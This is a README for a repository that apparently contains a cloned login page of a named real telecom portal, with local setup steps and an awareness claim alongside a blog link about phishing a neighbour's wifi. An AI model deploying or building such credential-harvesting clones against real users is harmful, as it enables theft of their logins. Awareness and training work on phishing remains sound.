# Phishing-Site
This is a phishing site created to show users and create awareness about how easy it is to create phishing site and avoid it.

DISCLAIMER: PHISHING IS ILLEGAL. I DON'T TAKE RESPONSIBILITY OF ANY ACTIVITY YOU CHOOSE TO DO WITH THIS.

Please visit my blog post on this : 
http://hackerintent.co.nf/2017/03/27/sphere-phishing-hack-use-neighbors-wifi-home/

How to set it up locally:

1. Install wamp/lampp/xampp and configure.
2. clone this into your htdocs directory.
3. Start apache service 
4. Go to http://localhost/Phishing-Site/www.internetvas.slt.lk/SLTVasPortal-war/application/login.html in your browser
5. Enter credentials and test

